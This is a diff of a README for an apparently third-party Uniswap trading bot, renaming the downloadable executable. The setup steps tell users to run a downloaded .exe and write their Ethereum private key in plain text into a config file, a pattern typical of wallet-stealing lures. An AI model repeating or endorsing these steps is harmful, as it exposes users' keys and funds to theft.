hobbit19/Uniswap-trading-client/README.md

 0. Read prerequisites

-1. Download the latest release or download "configfile.py" and "bot.exe" from the repository.
+1. Download the latest release or download "configfile.py" and "UNISWAP_bot.exe" from the repository.

 2. Open "configfile.py" (with notepad for instance) and add your ethereum address and personal key at the bottom of the file between the quotation marks('').